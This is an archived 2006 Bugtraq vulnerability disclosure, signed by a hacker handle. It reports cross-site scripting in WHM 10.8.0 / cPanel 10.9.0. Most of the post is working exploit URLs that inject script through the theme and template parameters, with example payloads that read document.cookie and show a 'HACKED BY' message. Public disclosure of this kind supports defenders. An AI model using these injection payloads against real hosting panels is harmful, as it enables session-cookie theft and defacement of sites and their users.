
Date: 22 Oct 2006 14:31:20 -0000
From: crackers_child@...ersavascilar.com
To: bugtraq@...urityfocus.com
Subject: WHM 10.8.0 cPanel 10.9.0 R50 CentOS 4.4 i686 WHM X v3.1.0 Xss
 Vulnerability


#########################################################
WHM 10.8.0 cPanel 10.9.0 R50 CentOS 4.4 i686 WHM X v3.1.0 Xss  Vulnerability
 
#########################################################

By Crackers_Child

crackers_child@...ersavascilar.com

www.sibersavacilar.com


#########################################################
Exploit
#########################################################


site.com:2082/scripts/dosetmytheme?theme=[XssCodes]

site.com:2082/scripts2/editzonetemplate?template=[XssCodes]

#########################################################

Examples


site.com:2082/scripts/dosetmytheme?theme=<script>alert(document.cookie)</script>

site.com:2082/scripts2/editzonetemplate?template=<script>alert(document.cookie)</script>

site.com:2082/scripts2/editzonetemplate?template=<script>alert(/HACKED BY CRACKERS_CH&#304;LD/)</script>

#########################################################

Greetz:All My Friends !

#########################################################


########### WWW.sibersavascilar.com  ##################
